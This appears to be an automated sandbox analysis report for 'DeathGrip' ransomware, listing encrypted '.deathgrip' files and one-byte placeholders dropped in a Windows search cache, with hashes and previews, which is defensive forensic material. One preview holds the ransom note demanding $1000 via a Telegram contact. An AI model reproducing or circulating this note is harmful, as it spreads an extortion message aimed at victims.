                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\QNBBNqWD9F_Blep-UqQSqnMp-FI[1].css

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\QNBBNqWD9F_Blep-UqQSqnMp-FI[1].css.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.115346786544661
                                                          Encrypted:false
                                                          SSDEEP:6:7GX76LGckv8sLCSKy8bD1nFv78JEP/LE1SmSJTfSkFPzTZWH/gJH1smM04Qd7:CXbc6LCSKzD1J8KP/L/JNzVW4404Qd7
                                                          MD5:B08414CD64856D50F13C252D902335D0
                                                          SHA1:7D07465572705A05B37D30CB53667BD53281CC09
                                                          SHA-256:FFE3C7DA4E1B8D8CBB86DD60DA20579A4893F0D4CA2C08151EAFDCC6894B1828
                                                          SHA-512:2F2B02A60D2BAB6AC442CBB53EAD1F8AD42A2453F5287BCE551C70E55192C430E946C5FAA9391888AD070AFBC5AB28148A14F031FA9D3A340581A05EA419F11D
                                                          Malicious:false
                                                          Preview:............D..~..U.e"egDjWfglE6c5WrXhwEXWk36GPHNkSbsFvHL/f+xHgQstflYbTtiZvQtd094zI7C7+HFjxkACT909GP7MAC69iSDZihP0Ls0/8n2xZUX+oz6kI1Lz7wPx97uySNYsyfDbUWSekQFh+OfHkQ2Z45JcbuTPl91HDuaaEai9AXGQZCGy5z5noWKVBL9BHBPUDbNf2RJnjRNO1CzufJWLlv36z3JR4Ngjl8gtxSSqbl/FDbqsVIncT4gTsTa2bl/x1UeGJSgOGzjE2eZ9DSoS1oNjW9oKZfkVd6dINwJX0WvLTjV9DGpw9XN+YP5oYRrSXIwdcH8Dj4brpZwPqhnK8NEpXQ==

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\QOGkmcG8R0fLT0lwbpvm9BNIUiY.br[1].js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\QOGkmcG8R0fLT0lwbpvm9BNIUiY.br[1].js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3232
                                                          Entropy (8bit):7.928636054326848
                                                          Encrypted:false
                                                          SSDEEP:96:lHVS9LQR8eUv+SoFzLsPp31VWhrhtAIZC:gRknshFVQbZC
                                                          MD5:5BB8D5D9AA8060B285DAB6016284B337
                                                          SHA1:E2CB01CAA072E0E58434F660188D4F3A2A5745EA
                                                          SHA-256:5A6EFEE201BE939FD0AEF3AAD57372BA9A35DCF8CC162E04172F06BBB2EBA52A
                                                          SHA-512:559059AC9391B90F65954C6D2D4A3C8F0FD7D5D9696BB34210D523A980A9D2E0C3E39B3ABCD2A4C9C103315D013101BB21491045727E060484EF1EC314A383B0
                                                          Malicious:false
                                                          Preview:........1/...y..."f_ikM.7...)r.-..`U....".K..}....X..b+jl.......j...Q....#]_.].l.6.+..C...g.....`.......?....j..."..l.w..s.....P*.C.q.U..'g0..E..{.l.)..\.P.CC.........G..8Em.D..lf ..~s?a...mRy.W0.-.v...... ..W..!x.aY-..IW.a...d...&3A..w .&.:..=..j..%..P...'y..F...... .+.4..u.........b.P.5.....\..9.....9...z.3.....E....+f.n.J.....s.c..+..h.....M./..Q.~.\..~-J.C&.17O..*...l&..H0?..V9./.Ll.N~.QF.b....>_.d.(.........E.<@3F.1.c[FeC...I.@.U.F.....;.W..<J*R..}.m'..fp.I.e.I...'J....\.F.`.y.Xg.....I..1..k........A....sk.&A..S.g.(.).[..V..X.....t.0.b....A.a..|=_.)4...M.!.lK.q".n.....\.m9..>.T.X.._o...(5v.=R.E........}.......5.).fc..>.;e..r....B..%J.Eq.3t).x..f.o.!..Ka.P..3.g.;..7.X/.....N.....q....33,.?.[..:."}PBv.<.@..f.I..Zj=..{... .M6zN.O4..t....1..Q.x.e..........%....l.......ff.u:A.qm.,.C...m.u..lZ...g.m.<.].{.I.f.........Q.r.......s...*.;.8...'[...J..MD...k.F}<'[......ORp.....+K...........u.4...>kj.........s...C...E.h-.............. .?..l".l.o#..3i.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\U7NyqzPRBLq0g0Z9QPSKxnaembc.br[1].js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\U7NyqzPRBLq0g0Z9QPSKxnaembc.br[1].js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11168
                                                          Entropy (8bit):7.981657259519676
                                                          Encrypted:false
                                                          SSDEEP:192:5EyajvxoNc1+H3UauqAMKqqNsK+/neQW3hQuzHGsKRJgZ17YImPBL6bpvWWWg2L2:5EySp2cIXopFqqNsMzxJzHGsKRCZSGbh
                                                          MD5:F472D6D88B79A9A0D42A971E2834749D
                                                          SHA1:ABEF6ACE99C1D4EA2A37777DBB36EA08905CDC86
                                                          SHA-256:DCD36F428B39AD28947C8AE7B5D10043A02699294B9C344478343436B060EE5F
                                                          SHA-512:6C9C0DAC0BE80BC4B194B368EC5069D0347CAD182973D5730B61EB1D3944F53471E3D6E4730E9E9E75042D7A0D0DFD07FC41A6CD1CA3E1D714439A9F203651C3
                                                          Malicious:false
                                                          Preview:.........E.p...&..m.<...c......%..".k....p..Ee%.d........lA....,l.#\...l.G...U..}.&.[........Yf...z...t.D..".....a...`UQC#?.2..-.!9..A..)..A<.I.[...(.+`.O.",B..j....~S...f.B.r.m.%.W1I.%..[#.i....t.........7..5...!....^7<$.c(7....x...-t..%.Z.O(..^...J.EN..W..O..v..\..T.5.N......6r.........i....I6.L+...D.$.......].}.\f...Q...k.&..a..K..R.....}......BN.kIG..4.....|8........9,[*K...T.....*Rq...}G.vM/...J....SXml.....m...7.n.cg..].7....m..}.z.%>5Z.....\Z.b..L.&.d.O.,....ZEZ..d.67........c..R....e......5&..te..G....!.p.E^ZVq^?SK.....v......~..i:\....D....`..JUs..io.9...M .........c.f_..I.U.J.K.jx..<..x........I.i.CZ.i.KtZ1w...?c&P..D3|.O.WO...M.~..5D.[".....R...........k...........?.S....>..J......,.#;..]..@.ND....|1.;.....W.......F...!.."<."V.l3..l+..$GQ.q.P.kw...@.Z.h.....6.K...R.th..`.;Q.X.F..`....xr...lV.2....=.....P.$.F.y..=j...pQ@.)......,I....S .`.L.Q..Z...q.C...]....).../.d*.tmNEF..p....8.5`........Z.<m........;p...D:a...Q....4l.9.`.N

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\XDTV5Ztdmvo1jmUE21mPICYC5h8.br[1].js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\XDTV5Ztdmvo1jmUE21mPICYC5h8.br[1].js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):545360
                                                          Entropy (8bit):7.999682540239591
                                                          Encrypted:true
                                                          SSDEEP:12288:malyGc7ZtnAYJDxBG+UGLQiBhgXs+5t/TEsG9j:7lyGc1RdNBVXQt7E1x
                                                          MD5:188F502007045AB94DBCC4556284BE0F
                                                          SHA1:A20C1EFB9E36E39F64298E3CE38E18612EDAD2D4
                                                          SHA-256:4F59E2D404CAAC5EA8CDC025465F11EF89670C02C190D886A064EFDF553AC93D
                                                          SHA-512:B4AB0F520998D43951CB3D8199B166B71DE75093C1EB5E2EEA9B837E93E214DD43B0C84AFC7A592075E5AFFB2C9DDBE0010D7DCF17629C66B9F457C255B5722D
                                                          Malicious:true
                                                          Preview:.........@L......bS#..d..P.E.$.7S..DQ..m....,-..)....\GpP..X=yQX.A...i.e.I...x#.....^.`.Z..p.E5.....J....1.".SCm.g3..5...^.<.dCo..].s...."..7.F....{..o..A(../...c....Lb.p.p..o....D.h:&x.G$..P...,?..r..[*.s..=w.......A..~...7./_)...F..T..Z;...k...............\..LM.8.K.C.....Y.>.f.F{...n..S.XWk..].._gFV.?..:.2h...u.GtB.q...Zw! .'..v.u.k.c.....XLF.t..F..S).....\.;6...T..i./.F.O).DZ*.0...K.=........F.'..+[.:.Qy....a.(..n.n}.......X..]....(fo....>Ul&S....i. ..I..!.r&..>.=.u.IG&...W....=U{w.+d&C.Z......z...|4&..D.G/L.hs.....w...H..do%......." .........e%....N. /...$~..I..k...c...H_W@.] S6...zah..d.H.?.....GF.dB.s..2.U.f..*4....f~...{....}...]...Yi.6l..pum.uk.0.a....I........i...H....t.\t.%...;7.W*jN.........>...4.NC...(.Z..VO\.d_.0.X.J.[.m...F..AR.....@@2..w...H.g./...C~tb......SF ..7...^..J .e..\..Z...#%Z.T.`.q....qVX..C.sqG..M...,.>dS.)T`.Ju..s....=k.....+.V...:"..Z.Q.D..a...:.Pg@..5m.9......I.~..T...u5...kV$..:.e....'.{.>....a...8.Y*...5..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\YfXD9vOw8__a60l-k1HNCxSbem4.br[1].js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):59120
                                                          Entropy (8bit):7.996714147572067
                                                          Encrypted:true
                                                          SSDEEP:768:MIOIOAOEVvd5whmMuKwi+EDeQosX6q0AJr+FkcLSm4wWQHHobZv:/OAOqvd4JDjvd0AJr+FkcLhnoR
                                                          MD5:36D03BA43F06C73118413FDDC77B2D92
                                                          SHA1:251CF19B685D57DCE8B1BA6E7E864A16CD5DFFF5
                                                          SHA-256:DFD33384D10300372709795AE0941B60FA77FDCD3314584CF56640EC3B7CD06E
                                                          SHA-512:D97DA24D2FA910FAE4DB4257FB3A6D60F20CF98A041E3509138DB9BF81C80D296113462D57BCA5EE148F20E146104978990540DDC9845EA3EFA9BE183CC561E3
                                                          Malicious:true
                                                          Preview:........Q.7.p+!3m.....2v..LHQ.:.Zik&..D)$.mXX.....a......)....A..p..]..=VP.3.95e,Y...^h.[..ES.y..H_.x|{4..b.k.|.D. ./S.......q....n...q..5.}p.....M:2.7M..ib....o.%..z|...ZN..p.J|...`Qh...By/l...T..r..L1,...RH..L...j..2...g.n.I.J..J..Zt.(.n.G!.4.C.=...V._.\.H..u..H..d.w.8Vh..>..../....<.e.{..O.l..M..4yZyJx..t.CxM....g.....~."t....."..*4.q...3...2<O(.]........5...5.#<K.H...y....7...H.a.A.x..z.....b..4..EcW......P....cr.....DYBi.$.gH...w:..0......e..L!3gi..YZ.....n*B.....b.....[L.a0:..m`...k/.s.<%.G..]._N!..0H...L.A..C....eR.e._...j.d.+..(E.G.L.+3..<:P;0....b..*.&.4~B...x.I`E....}....R.]..7..'.....E...f2{...C.&4..0...D)4.n..P.'.....!c?..d.}.m...O^',^3$)..|.s..]d.&H...Q....$..4.ruQ.-..]:S}]...Uxn...q.,o..h#...G0..=:Q?;i.'z.#UeR.VL._.do..{.u.+..M.ZL......s..y8p.$g..d.$.*T...Sx...o\.@..sD....5.I....)....$....w.a6."M....h....as.7.r4.6<.J...6.....H..HR._..."..nHW.... ......+..T..!.s.%.......;}m^y...|S...._;.)..Db<...n.f...\Y.C....R..|. .&..jX;5.%+.U

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\rUQ8SSsIzKcgb77SIOCfnAbpfB4.br[1].js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\rUQ8SSsIzKcgb77SIOCfnAbpfB4.br[1].js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):480
                                                          Entropy (8bit):6.781271963002579
                                                          Encrypted:false
                                                          SSDEEP:12:wNQbn6EQnnj2wn9Vinnie01W6AQ3+1vOgMy5KY3xSak:wCbLQnj2wn9VinnZ0wfQO1vHlNcak
                                                          MD5:0992BE80C33C2E1BD0DDDB0C7A84EFC2
                                                          SHA1:BDCF01597621434CC86262F5846637E25E3EF399
                                                          SHA-256:639AB1C0F3E4E4D339B06B16EAEC5D65D2335FE57D5EC4BCD0825605AAF12CB8
                                                          SHA-512:07820E478FD687346ED78D3C8398A8EBE01211EEC72B0B8570A2EA3FB8F1652A3D60A9374394ADB0D97172B8DEDC75C6D585D5BD9FB837D62DAAA51A1057A13B
                                                          Malicious:false
                                                          Preview:...........y.h<....d}.5h.X......\f.... .u.Er..D..B...!;..)^..R.[."...f.=L...L...9.;_y@...$..q9q0.p....|.>.....>..'g....S.l......A/4KCW9qtD7aZZME5eGN8mcJ93HTtDTjiUetdulcyZ18EmL5O1pTeLPHPWzCn4ZbkajzHpFD3HCzaSMUVM7SIhEj0d9EKZ2Yj7YfAlEDGQk9Vkp26yuTyzRAwHCCtOideAG8SStdDhYJimmZFu4KHumlDMXQFjcvLKE7iw35TNzuFcPe9Y4QKa022PTIjAKl08g22cCSWRs+PrrOqNGGmYYhwOznrpfa3k4+txuAa//X/v7xjK/p4WcexVoy050YO+p9NDuhljsgNlnXnh6tvVKRjiI6pK56ToyEgIYJW+UWGzERcEZHkPeYue99ARUnzOUzDESsNz/nCcaKowkl3w==

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\tIa_X3QDXj2Izj2HpQ_Mo9f1WiM.br[1].js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):126464
                                                          Entropy (8bit):7.998580305321073
                                                          Encrypted:true
                                                          SSDEEP:3072:7coJ3SKmHXkE2kD3v3IHMvMR5y5iA5VhUS6PzKxQu7KC:IeiKekk4sZcAptqKK0
                                                          MD5:FB19204B45B1E5720308C309939C211F
                                                          SHA1:591DBA3D8EEC68CC2A594D18A802FA63524A39A2
                                                          SHA-256:672F84A3E539E622F621F409E4E7EC70B4FC7C1D7A4658965BA7BDF648466D8B
                                                          SHA-512:8FA5B67C072742A0C98FFC82A55EE28118128A446B1D17FD25D287A8E86D12CB341198CE0ED6A8FEE8A01386D838B2682A50985ECC95FC66227F16CFEF5599D6
                                                          Malicious:true
                                                          Preview:........(....)+.:.:u.(.....Y..X.@V+...8.G7....4..3....jCP).4...|,..........@...%t...qr%.t....b.X.h..Y!;.8P..D.....B.r..P=8..6B..x(..|k...p..........|...*..y.....@....zdi....7^....o.^.....T.w%.......e8.......!.[]..............\.77t..;|..J...*....k.....3....y~z.8|".t...F.c....%..4H.^3...p..f..k.;ah.<t.L9.u..C.C.#.....;.@Dk.P..7g:?Ew...>.7..q..b.>.Ca"..zA.........DT..<.#..,Hl.Tf..(.ie....B/....<L....e....<3E.^........4I...<nb{.Jf(.U,..H......7...4....X...*0....; ..+~..&i....B.B.?.A...L..7:U.+..R.;...U.dM....X...E.eK.5l.*D.g..P..O.h..Iv,..|.;.C.o.^hA....I.s....?.,...Bw.DS....m.Eh......Fu....>.8P9..:9w.B.K7z*l....sN).=j...cbw\.!.>......uj..ql...L.0..^WV..y7......oX3...6..q...\..l.........a.C.j.*..^..."..fKu#<......6cj...N1.L....G.L.frB.5m.....g...).....s.p..(...66.Q....}Z.m..#.W..#....2ksV.G.:$.G4....p5.gD...z.....*.t....q.{....sO.(f.v..8.QB... ......A<.y4l.x/H7l......6....Nt?.^v...K...r.w.c,C.`.5.A...Z.n+nmR.........x...........8.N...._@.m.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\u6a26xOewOMoU1ZXcaLiQPZApTU.br[1].js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\u6a26xOewOMoU1ZXcaLiQPZApTU.br[1].js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1968
                                                          Entropy (8bit):7.8526690430085395
                                                          Encrypted:false
                                                          SSDEEP:48:vOwq0FKGKIXLFiMqT2YHPd7fyuV7AH+bf0rCXAid:Zqx6BLiduuVEH+bgCQid
                                                          MD5:C4CD6C36F22EE6980BCB5D49309AC93E
                                                          SHA1:279163BE53E03D1DE6F7CB66C7BF604F5C4CC0A5
                                                          SHA-256:F10620CE94C7A7AF9CCEC18AA411C70976EB14FE65A9FEC935A0E0B749F6BB3B
                                                          SHA-512:DA909F6CB2980EFE85344421A4800E627B0C461E155ED48CF7152B1F3D3FE53D7817AC4E283017FFCF42E20F748DB89B9BA8C564A06DD78D87CC9006DDAC2B07
                                                          Malicious:false
                                                          Preview:..........?.C..E.d..........h?p....;...M..*-.6...<....1_.........@...\k...o.....Pc.O.w.s\....M.{.r:sF.Y..7.dN.mU.$...D.1$.Uh.p.2=.......>.>..d..SD.......5B...MbG.+....8l...]..[.N!.&sM@.P..}.R.....A..\...'.8..]...FB.(..AS.....DYwo.r.oZ.@.E.F..M..T.8..r_.`.....5g.D.G9i.7.'...C1.pz..?.q2.bE..e.K...s-.D.K...,.o..A:.T..yx...P.>@1E .....M...x.....a.q..3K...bZ.I{.Q.M...}..).9.u[...D.....QIqmP...Fw..WpPW-{..*.K..2.hXj......h.s.......5.4.C.|. ..xn.....|.M. w......L2. G/%y.E.S./..gb..e....!../8;.....S..ZA..u....>....bF.~..Q8........).../a.s..~.4i..?...B...+.....F#:.v7.9.Bz..8..:.....b....|...o..p../;9M..^.o.I..m...g..42..9.....I...1%..^A..g.....x{...`...A....)..P( .O....."..._.^9/..BV.@.u2.]...q.T.x.W.p.gI.KL....7z........X....%KV....\Z.." .r..EU.....A.24.,D..F&'&Z.'...N...bn..:.....O.YFrn..K...R..7p k.b..L..r.'Nn.....7..{"..xF......Q.).@.}/.....u[DGn2.~..i.b.[..v.uB4.".(.%Gm........z..(...73T......]S.J..~X...o.._..2.rA2...-..oEO..G..4Y\..P..Z"H.#.[i..#.

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\uANxnX_BheDjd2-cdR8N9DEWlds[1].css

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\uANxnX_BheDjd2-cdR8N9DEWlds[1].css.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20784
                                                          Entropy (8bit):7.991922321649463
                                                          Encrypted:true
                                                          SSDEEP:384:QxTowoE4sLw1gQq6MYuLCXBTxZTgoao375//ncGxiRlEyEc:Q7LvCXB7xao3N3c9Ec
                                                          MD5:E6EC75DFA4AEA18B66839A85C69E74E5
                                                          SHA1:B2E3E0546AA522A48217D89E4E73292F148F1C97
                                                          SHA-256:983FDAF43211CAA471406E87AC044C24970FEA11F7268D9A7E9B0EDDD9E8AC67
                                                          SHA-512:4B9532EC05FBFE2C3BD19AEBB0EC57E48C0F625786603E89DCEE91C9F88290F70E56616316C3C467A8753D8E0352F34A05779B34A0508FC52722B9BFC4AE4B6B
                                                          Malicious:true
                                                          Preview:..........ui..Y.......ov......;Hf.}$Rw.....VLj.@0U..:.,w1........{5.=..a.M.(Z8h...wSF..M..b.W.Y.rF.<...h..U..$..f.....7..k.2........r..~k6n.?&}_.._$...[.......Tg.N!SQ..y.[......'......B.j.gf`;....+..n...nb.....c.....^V./~.H...d.,...;..O....W.....Ku..../..........r....#.Fw..A.H..>~> .].....n.N.)b!V.w...`.io(A=.r........R*j~.H.r...5..o....G.....ss./.....T$.jq.@.E..W&c.fv..."...S.......YZ}.Z....|X..p..*./h;.!...B....?y.r-...9.=.......'@1.<..../'....Eu.R;...V.......}%1..6{8+.YFL..=S'...2......F.3...c.Q.@.....ZK.D..%.Mnc/...q.....%.... C...U9...f..6..... .v...d.....;D.2.!..g.]3..I...\..6LD.Gc..x.E..M-#.t.h...>...o.:./...R..^Lt...up..d......:..r..^.o.....u.&.....HG.A.1.=@..].G6G...-.0.^#..[Y9....X...B.h.A...5`=Yh...B..u. ..oR.... .nE...h....[...F..@t...{1t.k.[.T......\z..-F..Nn(.$.|.FQ.J.o/.F...J.C}..d......LfnJ3.g.W..n..iE..S.\.....a.....r.......!dW+...7(......+..`..4.S.(..1..Rn.A.h.AO.J.@x...L..).Tv.tcvY_L...?.k.|...g%..k...x~.Z.\eq..

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0S019LQ4\2\wokAADULDNIRJUcpGmEjmH9QAB0.br[1].js.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):254784
                                                          Entropy (8bit):7.999109600912854
                                                          Encrypted:true
                                                          SSDEEP:6144:+4YuGN8DefzgCCEnfTCjCafeOzMSvV16URxtdTKkjc:+7uGN8DefzgGTa8Obvv6URxbTK8c
